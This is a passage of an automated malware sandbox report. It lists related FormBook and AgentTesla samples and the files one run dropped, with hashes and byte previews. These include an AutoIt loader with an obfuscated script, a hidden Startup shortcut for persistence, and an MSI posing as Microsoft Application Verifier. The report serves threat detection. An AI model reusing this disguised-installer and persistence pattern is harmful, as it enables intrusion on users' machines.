                          MAERSK_LINE_CONTAINER_OVERSEAS_SHIPPER.exeGet hashmaliciousFormBookBrowse
                            tBZ__Qj9(778).cmdGet hashmaliciousUnknownBrowse
                              11.ps1Get hashmaliciousUnknownBrowse
                                SARA_II__REQ._FOR_PROVISION_-_JUL_2023.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                  SARA_II__REQ._FOR_PROVISION_-_JUL_2023.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                    2.ps1Get hashmaliciousUnknownBrowse
                                      337864093.exeGet hashmaliciousAgentTeslaBrowse
                                        fa1lA9Hw1U(6958799).cmdGet hashmaliciousUnknownBrowse
                                          SecuriteInfo.com.FileRepMalware.18044.32672.exeGet hashmaliciousLokibotBrowse
                                            MARMEA_-_PROVISION_(QUOTATION).exeGet hashmaliciousFormBook, NSISDropperBrowse
                                              MARMEA_-_PROVISION_(QUOTATION).exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                27-06-2023__PDF_00233466115969388.exeGet hashmaliciousRemcosBrowse
                                                  Scan-02.exeGet hashmaliciousFormBookBrowse
                                                    ZANTE_-_VESSEL'S_PARTICULARS.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                      bank_swift.exeGet hashmaliciousSnake KeyloggerBrowse

                                                        Created / dropped Files

                                                        C:\ProgramData\fkeabad\Autoit3.exe

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):893608
                                                        Entropy (8bit):6.620131693023677
                                                        Encrypted:false
                                                        SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                                        MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                                        SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                                        SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                                        SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        Joe Sandbox View:
                                                        • Filename: xIgS6K1nPs.rtf, Detection: malicious, Browse
                                                        • Filename: no_halt_7891.msi, Detection: malicious, Browse
                                                        • Filename: no_halt_7891.msi, Detection: malicious, Browse
                                                        • Filename: no_halt_opts_enabled.msi, Detection: malicious, Browse
                                                        • Filename: no_halt_opts_enabled.msi, Detection: malicious, Browse
                                                        • Filename: MAERSK_LINE_CONTAINER_OVERSEAS_SHIPPER.exe, Detection: malicious, Browse
                                                        • Filename: tBZ__Qj9(778).cmd, Detection: malicious, Browse
                                                        • Filename: 11.ps1, Detection: malicious, Browse
                                                        • Filename: SARA_II__REQ._FOR_PROVISION_-_JUL_2023.exe, Detection: malicious, Browse
                                                        • Filename: SARA_II__REQ._FOR_PROVISION_-_JUL_2023.exe, Detection: malicious, Browse
                                                        • Filename: 2.ps1, Detection: malicious, Browse
                                                        • Filename: 337864093.exe, Detection: malicious, Browse
                                                        • Filename: fa1lA9Hw1U(6958799).cmd, Detection: malicious, Browse
                                                        • Filename: SecuriteInfo.com.FileRepMalware.18044.32672.exe, Detection: malicious, Browse
                                                        • Filename: MARMEA_-_PROVISION_(QUOTATION).exe, Detection: malicious, Browse
                                                        • Filename: MARMEA_-_PROVISION_(QUOTATION).exe, Detection: malicious, Browse
                                                        • Filename: 27-06-2023__PDF_00233466115969388.exe, Detection: malicious, Browse
                                                        • Filename: Scan-02.exe, Detection: malicious, Browse
                                                        • Filename: ZANTE_-_VESSEL'S_PARTICULARS.exe, Detection: malicious, Browse
                                                        • Filename: bank_swift.exe, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\fkeabad\efghhgd.au3

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):784356
                                                        Entropy (8bit):6.500990461253042
                                                        Encrypted:false
                                                        SSDEEP:12288:6byAIRMKMJZCL+TWHZMxdHQgCUCAH2zxMSTaiTDBCphXUgn+DRVnNsPlU0R/Nexe:OgLQQgogvXUnsPlU0ZNMIpZ
                                                        MD5:ED1131E98DAD331D3FEB1C38B2C6BA51
                                                        SHA1:BB3F4522D7D0D3F4D5B9917019242AE5496F6F16
                                                        SHA-256:B68861CDFC100021261A1F3067324628A31E85BA7EE3857FBD496D4AEFB2E68D
                                                        SHA-512:06BD7E2E7F72A2E572435773DDC20E22D25168DF923ADAFD8535367A9D6722AFA04EFA3D5A21737BDB5146F8B29F23DFEF6B281E007AFF10A98696A998D24692
                                                        Malicious:false
                                                        Preview:EktKhsozeEMDfgFPspSgUITVIwePrSdclBFnEMpeDODwqjBTbROJhkbDHevTyQGdqDwFyyUCpvRCEbYaZUNLgppVeVpWwhmPZmmlcipfAhFvyXwZaLSKhOTfHGhoEgdIiEkfgvgrQldGJJrrJINHdwsEqEBnwvpSFPeNhIwaeDLLWqdtxoWcrTQbvMmixcbpVlylekPlEMiqdrYjDizYZGNtFNntqyrKAqDaBplqSWmaYIsEehnWIfhTRSRnIBmCGKqjFcfTPYbwFBwkYhPazHvaxYqiovLdrfsrcxtOHqNkeGwvVlqOovwAdHqzbNJoDxaBjvtiVgVZzZzsAGPqtBBuHcIIQCaXbOssSKVwAgfxdeLVhJSnIYzYybsfIjDFplgYCanmHLmnfMjObTSLIEBOibFnGwfDMgOYpVfBPXsgXjUtmTSrxitGJjQDUztUEXxAKSGyUzMOebPVIxEnKrhEolGAJVcvUnboZkwDeJSWaoRsYzBiGIvbECSEqHPMARcvUiFBUwtrssSwLeRnbEnBBjBojbllhBOHPTIriuiMObKHpvulqujarQThNQSZrsjjGtEoePqXczimSQMoxrgDGLqIEglXwzXMTDPSgzgLapWowOjiZAzHqUAwqyMOGlxCGnjTiccUEwMBUVIgcVgUGTnZHMSTVZMtDgdtpEPoNljCTaSWqwtnhXHXroWxhuFAVNnJdWoLFwSJWVjTeSZXNYTToMoxZgCMzHavnBCdojqbsLKLmQjwKxwuukhGXdMrKgZtaxWkZadvrEjQiVHxCBWgKhPwskdhBysLQwWZeQCzSQiYWDyaicnMrwthsKgAARKQxRnsWWiGLWPBehosNuxTvpaOVRlnOlfrcJPkZanZEyZsQTdbTIOkmvPgSbrOdEdidFJyQjizWlsQTSrSuEKwgOOLQRiXHLBAoUlgaUgQcdiQEgaSzzUnyRWVoZhiusWPQyVeoasvdayNTDzuKvkuNujOAqsrMfgN

                                                        C:\ProgramData\fkeabad\kadfedf\afhbfhd

                                                        Download File
                                                        Process:C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):129
                                                        Entropy (8bit):6.439332390998306
                                                        Encrypted:false
                                                        SSDEEP:3:diG/sNsJ5jJEcApcAPmC2tWGBikSFIiBWCNmpn:T/sN+JEcA+1thBikSFJWGmp
                                                        MD5:EFE32663E95C34B9E5DFD8EA4CE9E337
                                                        SHA1:C4AFC04189F77CB661A3ADBFCB7B77989CBB0AFE
                                                        SHA-256:8B5BFA938B0DEA6D29384BE513A887FA4EC94FD08CF68520E3C51E4B17A7CB31
                                                        SHA-512:AF1C463891E0FBCA195DF8B39B5DC63CFE04FECABD1C569DD36E894AB52CB7CFD481D3901F93670D7CC74F5CCA9A37E37A41DF06DB13ABBC6F88F35BC7FAB74B
                                                        Malicious:false
                                                        Preview:qaLiJpqL4.....h.o]....a.....S.[........<f..'.....6I...8.C4a......r.....h..s.f......GW.v..o........... G.0T.8P..........S...

                                                        C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files.cab

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                        File Type:Microsoft Cabinet archive data, many, 1669773 bytes, 2 files, at 0x2c +A "Autoit3.exe" +A "UGtZgHHT.au3", ID 56955, number 1, 51 datablocks, 0 compression
                                                        Category:dropped
                                                        Size (bytes):1669773
                                                        Entropy (8bit):7.004183948977661
                                                        Encrypted:false
                                                        SSDEEP:24576:eT9FsEsyt8l+E+s1tB7parWM0+AL5QgZQvUXtAqlU0ZyMRpF:k9FBJZEH1X1arF0vN/nXr
                                                        MD5:E7C3B16ED93B760546AE6756B12644DA
                                                        SHA1:99B3B1AF70B45B4B815A814F61F9B6E509CD3BB6
                                                        SHA-256:659733A584C52078AC6B568DFB34A089BEF2B3835A5EA737D32C1623A468B743
                                                        SHA-512:B6EEAAEEB1F7C8335076075BC8033D5D4744544F3937EEADDCBEF5F7BA257A64C20A47F8388C1E8F10C5821DA8ABE0683BE8FD60C3E1A9AEA25E4A705E2F8B41
                                                        Malicious:false
                                                        Preview:MSCF.....z......,...............{...e...3..............VB. .Autoit3.exe............VB. .UGtZgHHT.au3.t/.Y....MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B...................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\224f4e28a4d4462680bba17a3145169d$dpx$.tmp\4d7bae1ad8a0f940a33036ae38ff0554.tmp

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):893608
                                                        Entropy (8bit):6.620131693023677
                                                        Encrypted:false
                                                        SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                                        MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                                        SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                                        SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                                        SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\224f4e28a4d4462680bba17a3145169d$dpx$.tmp\e004f9e1ae4f094daad741c0c79b7d17.tmp

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):775656
                                                        Entropy (8bit):6.502577735066428
                                                        Encrypted:false
                                                        SSDEEP:12288:pbyAIRMKMJZCL+TWHZMxdHQgCUCAH2zxMSTaiTDBCphXUgn+DRVnNsPlU0R/NexP:RgLQQgogvXUnsPlU0ZNMIpc
                                                        MD5:1B524D03B27B94906C1A87B207E08179
                                                        SHA1:8FBAD6275708A69B764992B05126E053134FB9E9
                                                        SHA-256:1AF981D9C5128B3657CDB5506D61563E0D1908B957E5DD6842059D6D3CFDC622
                                                        SHA-512:1E0F2AEA5DAA40B6CB7DF61BA86E0956356AB7B7ECFC9E2934BC85EEC8D42D3AEB32858DD0EAD24E82EF261A4120F6374263B7AF9256EB79A294D51273CC4F6E
                                                        Malicious:false
                                                        Preview:gljkbYNCNUfursQiNLDiefLJGttBjSzXQUkRysaJsXXdirQcwaLmzgXoNPNONKwsODeXMxFNCHdwkqrpLPKUWGVWZcMGbyYOHbJqwCXdIZwPTNCjYkYRchZQekJghDciYmDkJRShuIlyIzENsAKsbaYreZfsvOzjeocrnvFRJXTQjOCSUfQlJCfmvQOvlqiphrdcymZlTRXibmzduBSNrVizOIFwYNOMhQshljhIFSmVYVuNBygNXinpnkOBldfzWknVZZNNQnOvQllcPMFCbmdjlMHRBEPqigVkPqVvSWNfwWRQzpaYIZGVtjMBEezMpudtrKjNqrEtOohMPoLuBhzBOhSOhKNbHWnpNDClhITJVRWlHURJTqHpOPVOcYintOIrTlAzIIvyYEYwTDilBcBQecgMkQimvhkudUWAwPojfUXreOlXUKaVMsQTECkCDvyVnIlywfGqHADINlknXFyIcTFvnTKBzbOOZBjUVqWtVEwUjKaeoWIxMulHtTYrEHiyrsfyxPOSrIfnxioUZMTTPrJPicsPiaqWaWKnazcoxJhOAKrIRbPSDMiiUneEqcIHmVhzQdLlRXalhCjSdGEBLrbdZPsgZPrFTSeMxOdkijhiXcCzFpSrlwTQTpsDWyiqrjEQRCBQizWUrMSdTIHXwczMfQiTMtIPEmlNjWLIItLzEnmFWnAsYOUjoPTNSZdElnXWdgBqDJOOOvDJsAuMRVmzecAIzWqMusmWtXXwTLtuPfqsrLKEqrYepQbSMXdSPAYGsUpGGhKKvxOjIesJcFJqNJsrAXGYNHBhAdYCWaVRiGToHKIbbViGuJuTBWdLjBJUNmITdNgKyammmCuUzdwwljXarfgkyRKCoOlooltYDenkWAORfCLiqYPcsOndLipbFMLzWHJdyzXPOqBJOxvpQkLcOuGxAWHBFQwjAHbkeZfiyIOzQChoZztSICdbczrBypPfAlqsfBhakdfGPkMFhMvcTZhYffyL

                                                        C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe (copy)

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):893608
                                                        Entropy (8bit):6.620131693023677
                                                        Encrypted:false
                                                        SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                                        MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                                        SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                                        SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                                        SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\UGtZgHHT.au3 (copy)

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):775656
                                                        Entropy (8bit):6.502577735066428
                                                        Encrypted:false
                                                        SSDEEP:12288:pbyAIRMKMJZCL+TWHZMxdHQgCUCAH2zxMSTaiTDBCphXUgn+DRVnNsPlU0R/NexP:RgLQQgogvXUnsPlU0ZNMIpc
                                                        MD5:1B524D03B27B94906C1A87B207E08179
                                                        SHA1:8FBAD6275708A69B764992B05126E053134FB9E9
                                                        SHA-256:1AF981D9C5128B3657CDB5506D61563E0D1908B957E5DD6842059D6D3CFDC622
                                                        SHA-512:1E0F2AEA5DAA40B6CB7DF61BA86E0956356AB7B7ECFC9E2934BC85EEC8D42D3AEB32858DD0EAD24E82EF261A4120F6374263B7AF9256EB79A294D51273CC4F6E
                                                        Malicious:false
                                                        Preview:gljkbYNCNUfursQiNLDiefLJGttBjSzXQUkRysaJsXXdirQcwaLmzgXoNPNONKwsODeXMxFNCHdwkqrpLPKUWGVWZcMGbyYOHbJqwCXdIZwPTNCjYkYRchZQekJghDciYmDkJRShuIlyIzENsAKsbaYreZfsvOzjeocrnvFRJXTQjOCSUfQlJCfmvQOvlqiphrdcymZlTRXibmzduBSNrVizOIFwYNOMhQshljhIFSmVYVuNBygNXinpnkOBldfzWknVZZNNQnOvQllcPMFCbmdjlMHRBEPqigVkPqVvSWNfwWRQzpaYIZGVtjMBEezMpudtrKjNqrEtOohMPoLuBhzBOhSOhKNbHWnpNDClhITJVRWlHURJTqHpOPVOcYintOIrTlAzIIvyYEYwTDilBcBQecgMkQimvhkudUWAwPojfUXreOlXUKaVMsQTECkCDvyVnIlywfGqHADINlknXFyIcTFvnTKBzbOOZBjUVqWtVEwUjKaeoWIxMulHtTYrEHiyrsfyxPOSrIfnxioUZMTTPrJPicsPiaqWaWKnazcoxJhOAKrIRbPSDMiiUneEqcIHmVhzQdLlRXalhCjSdGEBLrbdZPsgZPrFTSeMxOdkijhiXcCzFpSrlwTQTpsDWyiqrjEQRCBQizWUrMSdTIHXwczMfQiTMtIPEmlNjWLIItLzEnmFWnAsYOUjoPTNSZdElnXWdgBqDJOOOvDJsAuMRVmzecAIzWqMusmWtXXwTLtuPfqsrLKEqrYepQbSMXdSPAYGsUpGGhKKvxOjIesJcFJqNJsrAXGYNHBhAdYCWaVRiGToHKIbbViGuJuTBWdLjBJUNmITdNgKyammmCuUzdwwljXarfgkyRKCoOlooltYDenkWAORfCLiqYPcsOndLipbFMLzWHJdyzXPOqBJOxvpQkLcOuGxAWHBFQwjAHbkeZfiyIOzQChoZztSICdbczrBypPfAlqsfBhakdfGPkMFhMvcTZhYffyL

                                                        C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\msiwrapper.ini

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1512
                                                        Entropy (8bit):3.6912619977233305
                                                        Encrypted:false
                                                        SSDEEP:24:Fmw5dX8DW8XjkLvl0HSEwg7fdrF39wJ9wEy29w8Ut8Jh:nYqjEDfhF39wJ9wEl9wltSh
                                                        MD5:406526B602B613C1EC5672387B911B74
                                                        SHA1:FBF498C6CA5781ECAFD94E44CC9168F07E5E96BC
                                                        SHA-256:F7082EACF5238976BB9C51F2B86AC92201B6AB693584B5E90A94859A477D226A
                                                        SHA-512:4EE4998A66FAF86BC43FEB263ABACF25E876E20CD9A07E937F0E089F4893D011B7BD0740DC4AEA2FDB0B71BA62961615E868FF62C98AD921D7B3E9C3CC4FBC7A
                                                        Malicious:false
                                                        Preview:W.r.a.p.p.e.d.A.p.p.l.i.c.a.t.i.o.n.I.d.=.{.2.C.B.A.8.8.3.F.-.5.1.A.6.-.3.D.7.D.-.D.B.B.9.-.0.5.2.7.D.3.9.4.3.3.C.B.}...W.r.a.p.p.e.d.R.e.g.i.s.t.r.a.t.i.o.n.=.H.i.d.d.e.n...I.n.s.t.a.l.l.S.u.c.c.e.s.s.C.o.d.e.s.=.0...E.l.e.v.a.t.i.o.n.M.o.d.e.=.n.e.v.e.r...B.a.s.e.N.a.m.e.=.A.u.t.o.i.t.3...e.x.e...C.a.b.H.a.s.h.=.6.5.9.7.3.3.a.5.8.4.c.5.2.0.7.8.a.c.6.b.5.6.8.d.f.b.3.4.a.0.8.9.b.e.f.2.b.3.8.3.5.a.5.e.a.7.3.7.d.3.2.c.1.6.2.3.a.4.6.8.b.7.4.3...S.e.t.u.p.P.a.r.a.m.e.t.e.r.s.=.U.G.t.Z.g.H.H.T...a.u.3. ...W.o.r.k.i.n.g.D.i.r.=...C.u.r.r.e.n.t.D.i.r.=.*.F.I.L.E.S.D.I.R.*...U.I.L.e.v.e.l.=.5...F.o.c.u.s.=.y.e.s...S.e.s.s.i.o.n.D.i.r.=.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.b.b.b.4.0.9.b.2.-.5.2.b.d.-.4.c.e.9.-.a.b.7.7.-.0.8.6.8.4.7.a.6.4.4.a.4.\...F.i.l.e.s.D.i.r.=.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.b.b.b.4.0.9.b.2.-.5.2.b.d.-.4.c.e.9.-.a.b.7.7.-.0.8.6.8.4.7.a.6.4.4.a.4.\.f.i.l.e.s.\...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.F.

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aafaecg.lnk

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Archive, ctime=Wed Jul 26 11:01:05 2023, mtime=Wed Jul 26 11:02:00 2023, atime=Wed Jul 26 11:01:05 2023, length=893608, window=hide
                                                        Category:dropped
                                                        Size (bytes):891
                                                        Entropy (8bit):4.50280361390797
                                                        Encrypted:false
                                                        SSDEEP:12:8DeLKdcqCzee/NuAkj/BajAWbQbPAVjbPAoubPA1UiKDkmeukmeMBm:8C7fcA+5mAikPA9PA/PA1UJeeeMBm
                                                        MD5:12A296AA09D7196EB34454D70B750991
                                                        SHA1:13DD5F81CBBDD558B2BA94FF4F7A342BABF8F136
                                                        SHA-256:CBFB56EC3F8A746F70B421486F68DD183291185C708CA06CD8D07090BECA0050
                                                        SHA-512:EE6A91FD4AB5470EAED9AF5FEEFB9A95EE1D4237076CCC64C21D8E0B0F82734CBE1514FCE72582048B20F945CD9A9DB2416292B5BD0632BDFB9B57B0A962FF42
                                                        Malicious:false
                                                        Preview:L..................F.... ...C......S.....................................G....P.O. .:i.....+00.../C:\...................`.1......V"`..PROGRA~3..H......L..V"`....F.....................=...P.r.o.g.r.a.m.D.a.t.a.....V.1......V#`..fkeabad.@.......V"`.V(`....<.......................N.f.k.e.a.b.a.d.....b.2......V#` .Autoit3.exe.H.......V#`.V#`....x.....................\G~.A.u.t.o.i.t.3...e.x.e.......Q...............-.......P...........'yV'.....C:\ProgramData\fkeabad\Autoit3.exe..:.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.f.k.e.a.b.a.d.\.A.u.t.o.i.t.3...e.x.e...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.f.k.e.a.b.a.d.\.".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.f.k.e.a.b.a.d.\.e.f.g.h.h.g.d...a.u.3.`.......X.......468325...........!a..%.H.VZAj....,r.h............!a..%.H.VZAj....,r.h...........E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

                                                        C:\Windows\Installer\5f09c5.msi

                                                        Download File
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Application Verifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 3.3.14.5, Subject: Application Verifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft, Keywords: Installer, Template: Intel;1033, Revision Number: {609A83EA-2275-4DEA-858D-BAEFF01E16D0}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2
                                                        Category:dropped
                                                        Size (bytes):1921024
                                                        Entropy (8bit):6.966994454036273
                                                        Encrypted:false
                                                        SSDEEP:24576:ftncpVGP4I9FsEsyt8l+E+s1tB7parWM0+AL5QgZQvUXtAqlU0ZyMRp:epUP59FBJZEH1X1arF0vN/nX
                                                        MD5:247A8CC39384E93D258360A11381000F
                                                        SHA1:23893F035F8564DFEA5030B9FDD54120D96072BB
                                                        SHA-256:6E068B9DCD8DF03FD6456FAEB4293C036B91A130A18F86A945C8964A576C1C70
                                                        SHA-512:336ECA9569C0072E92CE16743F47BA9D6BE06390A196F8E81654D6A42642FF5C99E423BFED00A8396BB0B037D5B54DF8C3BDE53757646E7E1A204F3BE271C998
                                                        Malicious:false
                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Windows\Installer\MSI3403.tmp

                                                        Download File
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):818
                                                        Entropy (8bit):5.483919835925761
                                                        Encrypted:false
                                                        SSDEEP:12:EgSByEK+c8Ov/3khF1ETUYhl/3C8Ov/3khF1Eb8fNEHWot3jtnLx298A6nok9eW:aB9C8Ov/3khANhQ8Ov/3khAD2K0mh
                                                        MD5:4F56271E25939DB53E061A846385F042
                                                        SHA1:120015D53F237F56A5DFB77A1F6198CFC684ECC9
                                                        SHA-256:47B0A4D7E04A361A15D7DC2D05F82F5FAE2030CC75B3B86F93CFC21FE7F4B13A
                                                        SHA-512:404CF7E3610F9B04ADFF4F9C235B780099692A68379D97B484098E211B577B132B9E7E45F5A089EDA653235D7CA4A25AB6C1466C8CB61BCE303A701276820928
                                                        Malicious:false
                                                        Preview:...@IXOS.@.....@#p.V.@.....@.....@.....@.....@.....@......&.{229FD164-E132-4ADB-8998-1DB40BF25484}h.Application Verifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com..15e7232gfN.msi.@.....@.....@.....@........&.{609A83EA-2275-4DEA-858D-BAEFF01E16D0}.....@.....@.....@.....@.......@.....@.....@.......@....h.Application Verifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{EDE10F6C-30F4-42CA-B5C7-ADB905E45BFC}^.02:\SOFTWARE\EXEMSI.COM\MSI Wrapper\Installed\{2CBA883F-51A6-3D7D-DBB9-0527D39433CB}\LogonUser.@.......@.....@.....@.......@.....@.....@....

                                                        C:\Windows\Installer\MSI3433.tmp

                                                        Download File
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):212992
                                                        Entropy (8bit):6.5134888693588575
                                                        Encrypted:false
                                                        SSDEEP:3072:3spAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLf2loHUvULyGxr5lqM2a8:BtOdiRQYpgjpjew5GAyGxjqo8
                                                        MD5:D82B3FB861129C5D71F0CD2874F97216
                                                        SHA1:F3FE341D79224126E950D2691D574D147102B18D
                                                        SHA-256:107B32C5B789BE9893F24D5BFE22633D25B7A3CAE80082EF37B30E056869CC5C
                                                        SHA-512:244B7675E70AB12AA5776F26E30577268573B725D0F145BFC6B848D2BD8F014C9C6EAB0FC0E4F0A574ED9CA1D230B2094DD88A2146EF0A6DB70DBD815F9A5F5B
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......b...........!.....h..........K...............................................{*....@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................

                                                        C:\Windows\Installer\MSIDAD.tmp

                                                        Download File
                                                        Process:C:\Windows\System32\msiexec.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):212992
                                                        Entropy (8bit):6.5134888693588575
                                                        Encrypted:false
                                                        SSDEEP:3072:3spAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLf2loHUvULyGxr5lqM2a8:BtOdiRQYpgjpjew5GAyGxjqo8
